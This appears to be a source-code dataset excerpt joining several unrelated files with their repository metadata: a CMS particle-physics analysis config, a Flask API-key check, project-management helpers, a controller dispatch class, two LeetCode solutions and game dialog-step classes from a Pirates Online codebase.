'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK8PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK8PFPuppi.txt'
]
jecLevelsAK4chs = [
'Summer16_23Sep2016BCDV4_DATA_L1FastJet_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2Relative_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L3Absolute_AK4PFPuppi.txt',
'Summer16_23Sep2016BCDV4_DATA_L2L3Residual_AK4PFPuppi.txt'
]
process.treeDumper = cms.EDAnalyzer("EDBRTreeMaker",
originalNEvents = cms.int32(1),
crossSectionPb = cms.double(1),
targetLumiInvPb = cms.double(1.0),
EDBRChannel = cms.string("VW_CHANNEL"),
lhe = cms.InputTag("externalLHEProducer"),
isGen = cms.bool(False),
isJEC = cms.bool(corrJetsOnTheFly),
RunOnMC = cms.bool(runOnMC),
RunOnSig = cms.bool(runOnSig),
generator = cms.InputTag("generator"),
genSrc = cms.InputTag("prunedGenParticles"),
pileup = cms.InputTag("slimmedAddPileupInfo"),
leptonicVSrc = cms.InputTag("leptonicV"),
gravitonSrc = cms.InputTag("graviton"),
looseMuonSrc = cms.InputTag("looseMuons"),
looseElectronSrc = cms.InputTag("looseElectrons"),
vetoMuonSrc = cms.InputTag("vetoMuons"),
vetoElectronSrc = cms.InputTag("vetoElectrons"),
goodMuSrc = cms.InputTag("goodMuons"),
MuSrc = cms.InputTag("slimmedMuons"),
EleSrc = cms.InputTag("slimmedElectrons"),
t1muSrc = cms.InputTag("slimmedMuons"),
metSrc = cms.InputTag("slimmedMETs"),
mets = cms.InputTag(METS),
#ak4jetsSrc = cms.InputTag("cleanAK4Jets"),
ak4jetsSrc = cms.InputTag("selectedUpdatedPatJetsDeepFlavourNewDFTraining"),
#ak4jetsSrc = cms.InputTag("slimmedJetPuppi"),
hadronicVSrc = cms.InputTag("hadronicV"),
hadronicVSrc_raw = cms.InputTag("slimmedJetsAK8"),
hadronicVSoftDropSrc = cms.InputTag("selectedPatJetsAK8SoftDropPacked"),
jets = cms.InputTag("slimmedJets"),
ak8JetSrc = cms.InputTag(jetsAK8),
fatjets = cms.InputTag(jetsAK8),
prunedjets = cms.InputTag(jetsAK8pruned),
softdropjets = cms.InputTag(jetsAK8softdrop),
puppijets = cms.InputTag(jetsAK8puppi),
jecAK8chsPayloadNames = cms.vstring( jecLevelsAK8chs ),
jecAK8chsPayloadNamesGroomed = cms.vstring( jecLevelsAK8chsGroomed ),
jecAK4chsPayloadNames = cms.vstring( jecLevelsAK4chs ),
BjecAK4chsPayloadNames = cms.vstring( BjecLevelsAK4chs ),
jecAK8puppiPayloadNames = cms.vstring( jecLevelsAK8puppi ),
jecAK8puppiPayloadNamesGroomed = cms.vstring( jecLevelsAK8puppiGroomed ),
jecpath = cms.string(''),
rho = cms.InputTag("fixedGridRhoFastjetAll"),
electronIDs = cms.InputTag("heepElectronID-HEEPV50-CSA14-25ns"),
muons = cms.InputTag("slimmedMuons"),
vertices = cms.InputTag("offlineSlimmedPrimaryVertices"),
hltToken = cms.InputTag("TriggerResults","","HLT"),
muPaths1 = cms.vstring("HLT_PFHT650_WideJetMJJ900DEtaJJ1p5_v*"),
muPaths2 = cms.vstring("HLT_PFHT800_v*"),
muPaths3 = cms.vstring("HLT_PFHT900_v*"),
muPaths4 = cms.vstring("HLT_PFJet450_v*"),
muPaths5 = cms.vstring("HLT_PFJet500_v*"),
muPaths6 = cms.vstring("HLT_AK8PFJet450_v*"),
muPaths7 = cms.vstring("HLT_AK8PFJet500_v*"),
muPaths8 = cms.vstring("HLT_AK8PFJet360_TrimMass30_v*"),
muPaths9 = cms.vstring("HLT_AK8PFHT700_TrimR0p1PT0p03Mass50_v*"),
muPaths10 = cms.vstring("HLT_PFHT650_WideJetMJJ950DEtaJJ1p5_v*"),
el1 = cms.vstring("HLT_Ele45_WPLoose_Gsf_v*"),
el2 = cms.vstring("HLT_Ele115_CaloIdVT_GsfTrkIdT_v*"),#("HLT_Ele35_WPLoose_Gsf_v*"),
el3 = cms.vstring("HLT_Ele27_WPTight_Gsf_v*"),
mu1 = cms.vstring("HLT_Mu50_v*"), #B2G-15-005
mu2 = cms.vstring("HLT_TkMu50_v*"), #B2G-15-005
mu3 = cms.vstring("HLT_PFMETNoMu120_PFMHTNoMu120_IDTight_v*"),
mu4 = cms.vstring("HLT_PFMETNoMu110_PFMHTNoMu110_IDTight_v*"),
noiseFilter = cms.InputTag('TriggerResults','', hltFiltersProcessName),
noiseFilterSelection_HBHENoiseFilter = cms.string('Flag_HBHENoiseFilter'),
noiseFilterSelection_HBHENoiseIsoFilter = cms.string("Flag_HBHENoiseIsoFilter"),
noiseFilterSelection_GlobalTightHaloFilter = cms.string('Flag_globalTightHalo2016Filter'),
noiseFilterSelection_EcalDeadCellTriggerPrimitiveFilter = cms.string('Flag_EcalDeadCellTriggerPrimitiveFilter'),
noiseFilterSelection_goodVertices = cms.string('Flag_goodVertices'),
noiseFilterSelection_eeBadScFilter = cms.string('Flag_eeBadScFilter'),
noiseFilterSelection_badMuon = cms.InputTag('BadPFMuonFilter'),
noiseFilterSelection_badChargedHadron = cms.InputTag('BadChargedCandidateFilter'),
)
if option=='GEN':
process.treeDumper.metSrc = 'genMetTrue'
process.treeDumper.isGen = True
process.analysis = cms.Path(process.leptonSequence +
#process.substructureSequence+
#process.redoPatJets+
#process.redoPrunedPatJets+
#process.redoSoftDropPatJets+
process.HBHENoiseFilterResultProducer+
process.ApplyBaselineHBHENoiseFilter+
process.ApplyBaselineHBHEIsoNoiseFilter+
process.jetSequence +
process.metfilterSequence +
process.gravitonSequence +
process.treeDumper)
if option=='RECO':
process.analysis.replace(process.leptonSequence, process.goodOfflinePrimaryVertex + process.leptonSequence)
process.load("ExoDiBosonResonances.EDBRCommon.data.RSGravitonToWW_kMpl01_M_1000_Tune4C_13TeV_pythia8")
process.source.fileNames = [
"/store/data/Run2016B/JetHT/MINIAOD/23Sep2016-v1/90000/EAF9587D-8082-E611-A783-0CC47A13CD56.root"
#"/store/data/Run2016B/JetHT/MINIAOD/23Sep2016-v1/90000/FE47EB9B-EB81-E611-B475-24BE05CEEB81.root"
#"/store/data/Run2016E/JetHT/MINIAOD/23Sep2016-v1/50000/483CEE4F-FB86-E611-94C8-0CC47A7C3572.root"
]
process.maxEvents.input = 2000
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.MessageLogger.cerr.FwkReport.limit = 99999999
process.TFileService = cms.Service("TFileService",
fileName = cms.string("RStreeEDBR_pickup7.root")
)
| [
"[email protected]"
] | |
b956a071a1cd830747a03be5cfbe515c771eb205 | 5eba0ee342adf574664ef2c5b2a9787f28ad9e4a | /core/utils/auth.py | 35059117c9a7332bc93e926280bf0e24a81a7e90 | [] | no_license | nagibator95/ejudge-front | 2775875bd8d8367674b3c5c372b5fafa77167aac | ca355f473702561047da030b7d4a12af06539395 | refs/heads/master | 2020-04-10T06:59:53.873278 | 2018-12-20T20:15:36 | 2018-12-20T20:15:36 | 160,870,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | from flask import request
from werkzeug.exceptions import Forbidden
def get_api_key_checker(key) -> callable:
    """Build a before-request hook validating the request's ``api-key`` header.

    Basic usage::

        app = Flask()
        app.before_request(get_api_key_checker(<my-secret-string>))

    Raises
    ------
    Forbidden: when api key is bad or not allowed
    """
    def check_api_key():
        supplied = request.headers.get('api-key')
        if supplied != key:
            raise Forbidden('API key is not valid!')
    return check_api_key
| [
"[email protected]"
] | |
9ac19c4aea106efafa3ec76b9113214d59ee531f | d20d7d0887e044cb369687629eee04d03bc6ac15 | /grano/logic/projects.py | cc54f580a84a76c3afff8ddffdeb95bdd13d3aa3 | [
"MIT"
] | permissive | nimblemachine/grano | 947812bdd2a861e7d62bd081423df2723891989a | ffbd3f974867334d396d536bd000a20a314f9fc6 | refs/heads/master | 2021-01-18T11:24:51.750426 | 2014-03-24T10:39:35 | 2014-03-24T10:39:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,796 | py | import colander
from datetime import datetime
from grano.core import app, db, url_for
from grano.lib.exc import NotImplemented
from grano.logic.validation import database_name
from grano.logic.references import AccountRef
from grano.logic import accounts
from grano.model import Project
def validate(data, project):
    """Validate raw project *data*; the slug may only collide with *project* itself."""
    def _is_same_project(slug):
        # A slug is acceptable when unused, or when it already belongs
        # to the project being updated.
        return Project.by_slug(slug) == project

    slug_available = colander.Function(_is_same_project, message="Project exists")

    class ProjectValidator(colander.MappingSchema):
        slug = colander.SchemaNode(colander.String(),
                                   validator=colander.All(database_name, slug_available))
        label = colander.SchemaNode(colander.String(),
                                    validator=colander.Length(min=3))
        private = colander.SchemaNode(colander.Boolean(),
                                      missing=False)
        author = colander.SchemaNode(AccountRef())
        settings = colander.SchemaNode(colander.Mapping(),
                                       missing={})

    return ProjectValidator().deserialize(data)
def save(data, project=None):
    """ Create or update a project with a given slug. """
    # Validate against the (possibly None) existing project so the
    # slug-uniqueness check accepts the project's own current slug.
    data = validate(data, project)
    if project is None:
        # Creation path only: slug and author are fixed at creation time.
        project = Project()
        project.slug = data.get('slug')
        project.author = data.get('author')
        # Grant the creating account admin rights on the new project.
        # (Imported here to avoid a circular import at module load time.)
        from grano.logic import permissions as permissions_logic
        permissions_logic.save({
            'account': data.get('author'),
            'project': project,
            'admin': True
        })
    project.settings = data.get('settings')
    project.label = data.get('label')
    project.private = data.get('private')
    project.updated_at = datetime.utcnow()
    db.session.add(project)

    # TODO: make this nicer - separate files?
    # Seed the project with the base schema fixture on every save.
    from grano.logic.schemata import import_schema
    with app.open_resource('fixtures/base.yaml') as fh:
        import_schema(project, fh)

    db.session.flush()
    return project
def delete(project):
    # Project deletion is not supported yet.  NotImplemented here is grano's
    # custom exception from grano.lib.exc, not the Python builtin sentinel.
    raise NotImplemented()
def to_rest_index(project):
    """Minimal REST representation of *project* for index listings."""
    rest = {}
    rest['slug'] = project.slug
    rest['label'] = project.label
    rest['api_url'] = url_for('projects_api.view', slug=project.slug)
    return rest
def to_rest_index_stats(project):
    """Index representation of *project* plus entity/relation counts."""
    data = to_rest_index(project)
    data.update({
        'entities_count': project.entities.count(),
        'relations_count': project.relations.count(),
    })
    return data
def to_rest(project):
    """Full REST representation of *project*: settings, author, and the
    URLs of the project's schemata, entities and relations indexes."""
    slug = project.slug
    data = to_rest_index_stats(project)
    data['settings'] = project.settings
    data['author'] = accounts.to_rest_index(project.author)
    # NOTE: the schemata endpoint takes `slug=`, the other two take `project=`.
    data['schemata_index_url'] = url_for('schemata_api.index', slug=slug)
    data['entities_index_url'] = url_for('entities_api.index', project=slug)
    data['relations_index_url'] = url_for('relations_api.index', project=slug)
    return data
| [
"[email protected]"
] | |
2a7f70925be3844266a29d8d9c3d9824794a0c0f | dfab6798ece135946aebb08f93f162c37dd51791 | /core/luban/controller/Actor.py | 8452c92ace1f56996ae2ccc29b60f307a6a30f4f | [] | no_license | yxqd/luban | 405f5f7dcf09015d214079fe7e23d644332be069 | 00f699d15c572c8bf160516d582fa37f84ac2023 | refs/heads/master | 2020-03-20T23:08:45.153471 | 2012-05-18T14:52:43 | 2012-05-18T14:52:43 | 137,831,650 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class Actor(object):
    """Base class for controller actors: dispatches named routines on demand."""

    # properties
    name = None        # name of the actor
    controller = None  # the controller

    # exceptions
    from .exceptions import RoutineNotFound

    # methods
    def perform(self, routine=None, *args, **kwds):
        """Look up *routine* on this actor and invoke it with the given args.

        The special keyword "kwds" may carry an extra keyword dict (possibly
        JSON-encoded) that is merged into the call's keyword arguments.
        """
        if routine is None:
            routine = "default"
        # Leading underscore marks a private routine: refuse to dispatch it.
        if routine.startswith('_'):
            raise RuntimeError("%s is private" % routine)

        try:
            behavior = getattr(self, routine)
        except AttributeError:
            msg = "actor %r: routine %r is not yet implemented" % (
                self.name, routine)
            raise self.RoutineNotFound(msg)

        # special name "kwds": merge an embedded keyword dict into kwds.
        if 'kwds' in kwds:
            extra = kwds['kwds']
            if isinstance(extra, strbase):
                # JSON-encoded keyword dict coming from the web layer.
                from ..weaver.web._utils import jsonDecode
                extra = jsonDecode(extra)
            for key in extra:
                # Refuse to silently overwrite an explicitly passed keyword.
                if key in kwds:
                    raise RuntimeError("conflict key: %s" % key)
            kwds.update(extra)
            del kwds['kwds']

        return behavior(*args, **kwds)

    pass # end of Actor
from luban import py_major_ver
# Select the base string type for isinstance() checks in Actor.perform:
# `basestring` covers str and unicode on Python 2; Python 3 unified them
# into str.  Evaluated lazily per-branch so `basestring` is never touched
# on Python 3 (it would be a NameError there).
if py_major_ver == 2:
    strbase = basestring
elif py_major_ver == 3:
    strbase = str
# End of file
| [
"[email protected]"
] | |
5bcff8ae4c42c2bafb1c80881769ed67f44ea8e9 | f2889a13368b59d8b82f7def1a31a6277b6518b7 | /256.py | d94465af0b09e0a288eb3073779e9c08ea3bc589 | [] | no_license | htl1126/leetcode | dacde03de5c9c967e527c4c3b29a4547154e11b3 | c33559dc5e0bf6879bb3462ab65a9446a66d19f6 | refs/heads/master | 2023-09-01T14:57:57.302544 | 2023-08-25T15:50:56 | 2023-08-25T15:50:56 | 29,514,867 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | # ref: https://discuss.leetcode.com/topic/21337/1-lines-ruby-python
class Solution(object):
    def minCost(self, costs):
        """Minimum total cost to paint all houses so that no two adjacent
        houses share a color (LeetCode 256, "Paint House").

        :type costs: List[List[int]]  # costs[i][j] = cost of house i in color j
        :rtype: int
        """
        # Rolling DP: prev[j] is the cheapest cost so far with the most
        # recent house painted color j.  Returns 0 for an empty input.
        prev = [0] * 3
        for now in costs:
            # The previous house must use a different color, so each entry
            # takes the cheapest of the *other two* previous entries.
            # (xrange was Python-2-only; range works on both 2 and 3.)
            prev = [now[j] + min(prev[:j] + prev[j + 1:]) for j in range(3)]
        return min(prev)
if __name__ == '__main__':
sol = Solution()
print sol.minCost([[1, 2, 3], [3, 2, 1]])
| [
"[email protected]"
] | |
0df69e3db7af12577fa662d3a36c94d62a749ea6 | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/257.py | de9a0c8a3c1cbc818b3466259db95a34a7020459 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 678 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def binaryTreePaths(self, root: "TreeNode") -> "List[str]":
        """Return every root-to-leaf path as a "v1->v2->...->vk" string.

        Bug fix: the annotations are now string forward references.  The
        original bare `TreeNode` / `List[str]` annotations were evaluated
        at definition time, and neither name is defined or imported in
        this file (TreeNode is supplied by the judge), so importing the
        module raised NameError.
        """
        def dfs(node, arr):
            # arr holds the values on the path from the root down to `node`.
            if not node.right and not node.left:
                # Leaf reached: serialize the accumulated path.
                self.res += ['->'.join(str(num) for num in arr)]
            if node.left:
                dfs(node.left, arr + [node.left.val])
            if node.right:
                dfs(node.right, arr + [node.right.val])

        self.res = []
        if not root:
            return []
        dfs(root, [root.val])
        return self.res
"[email protected]"
] | |
3fbb4786ff15759eb93e82bc5ad3d7e00e55e2b8 | ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f | /Sourcem8/pirates/quest/DialogProcess.py | dd929c9b374131c5d5005f5d444192c13516197e | [] | no_license | BrandonAlex/Pirates-Online-Retribution | 7f881a64ec74e595aaf62e78a39375d2d51f4d2e | 980b7448f798e255eecfb6bd2ebb67b299b27dd7 | refs/heads/master | 2020-04-02T14:22:28.626453 | 2018-10-24T15:33:17 | 2018-10-24T15:33:17 | 154,521,816 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17,677 | py | from direct.showbase.PythonUtil import makeTuple
from pirates.piratesbase.PythonUtil import POD
from direct.showbase.DirectObject import DirectObject
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import PiratesGuiGlobals
from pirates.piratesgui import GuiButton
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.quest import QuestOffer
from pirates.quest.QuestPrereq import *
from pirates.effects import CombatEffect
from pirates.audio import SoundGlobals
from pirates.audio.SoundGlobals import loadSfx
class DialogProcess(POD, DirectObject):
    """One step of a scripted NPC dialog sequence (client side).

    Subclasses override begin()/end()/cleanup() to show dialog text,
    play emotes, offer quests, etc.  DataSet is the POD property spec:
    `prereq` lists prerequisite objects gating the step, `dialogId`
    identifies the dialog script, and `delayCleanup` flags steps whose
    teardown is deferred.
    """
    DataSet = {
        'prereq': [],
        'dialogId': None,
        'delayCleanup': False }

    def avCanParticipate(self, av):
        # Client-side gate: every prereq must pass for avatar `av`.
        for prereq in self.prereq:
            if not prereq.avIsReady(av):
                return False
            continue
        return True

    def avCanParticipateAI(self, av):
        # AI-side variant of the gate (uses avIsReadyAI).
        for prereq in self.prereq:
            if not prereq.avIsReadyAI(av):
                return False
            continue
        return True

    def handleEscapeKey(self):
        # Default: escape does nothing; subclasses advance/close GUI here.
        pass

    def begin(self, npc, dialogId):
        # Start the step: listen for escape and remember the context.
        self.accept('escape', self.handleEscapeKey)
        self.dialogId = dialogId
        self.npc = npc

    def end(self):
        # Finish the step and notify the dialog driver to advance.
        self.ignore('escape')
        messenger.send('DialogProcessEnded')

    def cleanup(self):
        # Default: nothing to tear down; subclasses remove GUI/intervals.
        pass
class Prereq(DialogProcess):
    """No-op dialog step: its only effect is its prereq gating — it ends
    immediately after beginning."""

    def begin(self, npc, dialogId):
        DialogProcess.begin(self, npc, dialogId)
        self.end()
class NPCDialog(DialogProcess):
DataSet = {
'textId': None }
def _NPCDialog__getDialogText(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('dialog')
def _NPCDialog__getDialogEmotes(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('emotes')
def _NPCDialog__handleNextChatPage(self, pageNumber, elapsed):
if pageNumber == base.localAvatar.guiMgr.dialogSubtitler.getNumChatPages() - 1:
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
self.ignore('nextChatPage')
self.end()
else:
self._NPCDialog__playAnimation(pageNumber)
def _NPCDialog__playAnimation(self, index):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
if self.dialogAnimSet:
if len(self.dialogAnimSet) > index and self.dialogAnimSet[index]:
self.npc.gameFSM.request('Emote')
self.npc.playEmote(self.dialogAnimSet[index])
def cleanup(self):
self.ignore('nextChatPage')
self.ignore('doneChatPage')
if self.dialogBox:
self.dialogBox.remove_node()
if self.nametagLabel:
self.nametagLabel.destroy()
def handleEscapeKey(self):
localAvatar.guiMgr.dialogSubtitler.advancePageNumber()
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animationIval = None
self.dialogAnimSet = []
self.defaultAnim = None
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_left').hide()
self.dialogBox.find('**/pointer_none').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.nametagLabel = DirectLabel(parent = aspect2d, relief = None, text = self.npc.getName(), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_align = TextNode.ARight, text_fg = PiratesGuiGlobals.TextFG8, text_scale = 0.055, pos = (0.3, 0, -0.44))
self.nametagLabel.setBin('gui-fixed', 1)
dialogStr = self._NPCDialog__getDialogText()
self.dialogAnimSet = self._NPCDialog__getDialogEmotes()
localAvatar.guiMgr.dialogSubtitler.setPageChat(dialogStr)
self._NPCDialog__playAnimation(0)
if localAvatar.guiMgr.dialogSubtitler.getNumChatPages() == 1:
self._NPCDialog__handleNextChatPage(0, 0)
else:
self.accept('nextChatPage', self._NPCDialog__handleNextChatPage)
self.accept('doneChatPage', self.end)
def end(self):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
DialogProcess.end(self)
class PlayerDialog(DialogProcess):
DataSet = {
'textId': 0 }
def _PlayerDialog__getDialogText(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('dialog')
def _PlayerDialog__getDialogEmotes(self):
return PLocalizer.DialogStringDict.get(self.dialogId).get(self.textId).get('emotes')
def _PlayerDialog__handleNextChatPage(self, pageNumber, elapsed):
if pageNumber == base.localAvatar.guiMgr.dialogSubtitler.getNumChatPages() - 1:
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
self.ignore('nextChatPage')
self.end()
else:
self._PlayerDialog__playAnimation(pageNumber)
def _PlayerDialog__playAnimation(self, index):
if self.animationIval:
self.animationIval.finish()
self.animationIval = None
if self.dialogAnimSet:
if not self.defaultAnim:
self.defaultAnim = self.npc.getCurrentAnim()
if len(self.dialogAnimSet) > index and self.dialogAnimSet[index]:
localAvatar.playEmote(self.dialogAnimSet[index])
def cleanup(self):
self.ignore('nextChatPage')
self.ignore('doneChatPage')
localAvatar.guiMgr.dialogSubtitler.clearText()
if self.dialogBox:
self.dialogBox.remove_node()
if self.nametagLabel:
self.nametagLabel.destroy()
def handleEscapeKey(self):
localAvatar.guiMgr.dialogSubtitler.advancePageNumber()
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.animationIval = None
self.dialogAnimSet = []
self.defaultAnim = None
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_right').hide()
self.dialogBox.find('**/pointer_none').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.nametagLabel = DirectLabel(parent = aspect2d, relief = None, text = localAvatar.getName(), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG8, text_scale = 0.055, pos = (-0.6, 0, -0.44))
self.nametagLabel.setBin('gui-fixed', 1)
dialogStr = self._PlayerDialog__getDialogText()
self.dialogAnimSet = self._PlayerDialog__getDialogEmotes()
localAvatar.guiMgr.dialogSubtitler.setPageChat(dialogStr)
self._PlayerDialog__playAnimation(0)
if localAvatar.guiMgr.dialogSubtitler.getNumChatPages() == 1:
self._PlayerDialog__handleNextChatPage(0, 0)
else:
self.accept('nextChatPage', self._PlayerDialog__handleNextChatPage)
self.accept('doneChatPage', self.end)
class StepChoice(DialogProcess):
DataSet = {
'choices': tuple() }
def _StepChoice__getDialogChoiceText(self, stepId, index = 0):
DialogDict = DialogDict
import pirates.quest.DialogTree
textId = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(stepId)[index].getTextId()
if 'choice' in PLocalizer.DialogStringDict.get(self.dialogId).get(textId):
return PLocalizer.DialogStringDict.get(self.dialogId).get(textId).get('choice')
else:
return PLocalizer.DialogStringDict.get(self.dialogId).get(textId).get('dialog')
def highlightIcon(self, buttonIndex, event):
self.choiceButtons[buttonIndex]['image_color'] = PiratesGuiGlobals.TextFG8
def unhighlightIcon(self, buttonIndex, event):
self.choiceButtons[buttonIndex]['image_color'] = PiratesGuiGlobals.TextFG2
def buttonClicked(self, stepId):
messenger.send('SwitchStep', [
stepId])
def handleEscapeKey(self):
pass
def displayStepChoices(self):
DialogDict = DialogDict
import pirates.quest.DialogTree
self.choiceLabels = []
self.choiceButtons = []
gui = loader.loadModel('models/gui/compass_main')
choiceIcon = gui.find('**/icon_sphere')
for i in xrange(len(self.choices)):
index = 0
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
while not isinstance(process, PlayerDialog):
index += 1
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
while not process.avCanParticipate(localAvatar):
index += 1
process = DialogDict.get(self.npc.getUniqueId()).get(self.dialogId).get(self.choices[i])[index]
if process.avCanParticipate(localAvatar) and isinstance(process, PlayerDialog):
choiceButton = GuiButton.GuiButton(parent = aspect2d, relief = None, text = self._StepChoice__getDialogChoiceText(self.choices[i], index), text_font = PiratesGlobals.getPirateFont(), text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = None, text_align = TextNode.ALeft, text_scale = 0.055, text0_fg = PiratesGuiGlobals.TextFG2, text1_fg = PiratesGuiGlobals.TextFG8, text2_fg = PiratesGuiGlobals.TextFG8, text3_fg = PiratesGuiGlobals.TextFG9, image = choiceIcon, image_scale = 0.29999999999999999, image_pos = (-0.050000000000000003, 0, 0.0070000000000000001), geom = None, pos = (-1.1499999999999999, 0, -0.47999999999999998 - i * 0.074999999999999997), command = self.buttonClicked, extraArgs = [
self.choices[i]])
choiceButton.setBin('gui-fixed', 1)
choiceButton.bind(DGG.ENTER, self.highlightIcon, extraArgs = [
i])
choiceButton.bind(DGG.EXIT, self.unhighlightIcon, extraArgs = [
i])
self.choiceButtons.append(choiceButton)
continue
def cleanUpStepChoices(self):
for button in self.choiceButtons:
button.destroy()
self.choiceButtons = []
def cleanup(self):
self.cleanUpStepChoices()
if self.dialogBox:
self.dialogBox.remove_node()
self.dialogBox = None
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.dialogBox = loader.loadModel('models/gui/pir_m_gui_frm_questChat')
self.dialogBox.reparentTo(aspect2d)
self.dialogBox.setScale(25.5)
self.dialogBox.setPos(-0.48, 0, -0.58)
self.dialogBox.find('**/pointer_left').hide()
self.dialogBox.find('**/pointer_right').hide()
self.dialogBox.setBin('gui-fixed', 0)
self.displayStepChoices()
localAvatar.guiMgr.dialogSubtitler.confirmButton.hide()
class SwitchStep(DialogProcess):
DataSet = {
'stepId': 0 }
class ExitDialog(DialogProcess):
def begin(self, npc, dialogId):
npc.requestExit()
self.end()
class OfferQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.acceptOnce('setDialogQuestOffer', self._OfferQuest__gotQuestOffer)
npc.requestDialogQuestOffer(self.questId, dialogId)
def _OfferQuest__gotQuestOffer(self):
def handleOption(option):
if option == PLocalizer.Accept:
self.npc.assignDialogQuestOffer()
self.end()
self.npc.showDialogQuestOffer()
localAvatar.guiMgr.dialogSubtitler.setPageChat('', options = [
PLocalizer.Decline,
PLocalizer.Accept], callback = handleOption)
def handleEscapeKey(self):
pass
class AssignQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
self.acceptOnce('setDialogQuestOffer', self._AssignQuest__gotQuestAssigned)
npc.requestDialogQuestAssignment(self.questId, dialogId)
def end(self):
self.npc.cleanUpQuestDetails()
DialogProcess.end(self)
def _AssignQuest__gotQuestAssigned(self):
def handleOption(option):
self.end()
self.npc.showDialogQuestOffer()
localAvatar.guiMgr.dialogSubtitler.setPageChat('', options = [
PLocalizer.Accept], callback = handleOption)
def handleEscapeKey(self):
pass
class AdvanceQuest(DialogProcess):
DataSet = {
'questId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.requestDialogQuestAdvancement(self.questId, dialogId)
self.end()
class ShowGivenQuest(DialogProcess):
def begin(self, npc, dialogId):
npc.displayNewQuests()
def handleEscapeKey(self):
pass
class ShowRewards(DialogProcess):
def begin(self, npc, dialogId):
npc.showQuestRewards()
self.end()
class HideRewards(DialogProcess):
def begin(self, npc, dialogId):
npc.hideQuestRewards()
self.end()
class MakeNPCHostile(DialogProcess):
DataSet = {
'npcId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.requestNPCHostile(self.npcId, dialogId)
self.end()
class PlayCombatEffectOnNPC(DialogProcess):
DataSet = {
'effectId': None }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
combatEffect = CombatEffect.CombatEffect(self.effectId, attacker = localAvatar)
combatEffect.reparentTo(render)
combatEffect.setPos(npc.getPos(render) + Point3(0, 0, 2.5))
combatEffect.play()
self.end()
class FadeOutGhost(DialogProcess):
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
npc.fadeOutGhost()
self.end()
class Delay(DialogProcess):
DataSet = {
'duration': 0 }
def begin(self, npc, dialogId):
DialogProcess.begin(self, npc, dialogId)
taskMgr.doMethodLater(self.duration, self.endWaitTask, 'endDialogProcess')
def endWaitTask(self, task):
self.end()
def cleanup(self):
taskMgr.remove('endDialogProcess')
class SwitchVisualModeNPC(DialogProcess):
DataSet = {
'mode': None,
'skipHide': False }
